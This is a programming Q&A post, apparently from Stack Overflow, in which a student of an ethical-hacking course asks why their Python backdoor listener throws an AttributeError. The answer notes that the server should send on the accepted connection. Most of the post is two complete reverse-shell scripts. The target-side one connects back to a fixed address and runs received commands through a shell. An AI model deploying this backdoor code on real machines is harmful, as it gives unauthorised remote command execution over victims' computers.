# "AttributeError: 'module' object has no attribute 'send'" When using socket for a backdoor

Tags: python, malware

I have been following a course (below) for ethical hacking and I have been following his course up to the making a backdoor part. I haven't been able to get past it because I keep getting an error (below) when I use the socket module.

Course (paid for): https://uthena.com/courses/take/masterhacking19/lessons/6589724-fixing-backdoor-bugs-adding-functions

Error: AttributeError: 'module' object has no attribute 'send'

The file where I get the error:

```
import socket
import json


def reliable_send(data):
    json_data = json.dumps(data)
    socket.send(json_data)

def reliable_recv():
    json_data = ""
    while True:
        try:
            json_data = json_data + target.recv(1024)
            return json.loads(json_data)
        except ValueError:
            continue

def shell():
    while True:
        command = raw_input("* Shell#~%s: " % str(ip))
        reliable_send(command)
        if command == "q":
            break
        else:
            result = reliable_recv()
            print(result)

def server():
    global s
    global ip
    global target
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("192.168.1.146",54321))
    s.listen(5)
    print("Listening for Incoming Connections")
    target, ip = s.accept()
    print("Target Connected")

server()
shell()
s.close()
```

The file on the target's computer:

```
import socket
import subprocess
import json

def reliable_send(data):
    json_data = json.dumps(data)
    sock.send(json_data)

def reliable_recv():
    json_data = ""
    while True:
        try:
            json_data = json_data + sock.recv(1024)
            return json.loads(json_data)
        except ValueError:
            continue
def shell():
    while True:
        command = reliable_recv()
        if command == "q":
            break
        else:
            try:
                proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                result = proc.stdout.read() + proc.stderr.read()
                reliable_send(result)
            except:
                reliable_send("[!!] Can't Execute That Command")

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.146",54321))
print("Connection Established")
shell()
sock.close()
```

Answer (score 1):

You need a connected socket to be able to send and receive data.  Your program is using the socket module as though it were a connected socket but it isn't.  It's just a module where socket-related APIs live.

Your client has a connected socket - the global `sock`.  Your server doesn't have one though and `reliable_send` calls `socket.send`, which doesn't exist, as the exception points out.

The way to get a connected socket on the server is to use the `accept` method of the listening socket your server sets up.

Comment: Thank you very much! I will definitely try this when I am able to, thanks again!

Comment: As a little inquiry, how would I go about implementing an accept method into my code?

Comment: I googled "python socket accept tutorial" and the first hit was https://realpython.com/python-sockets/ which seems to answer that question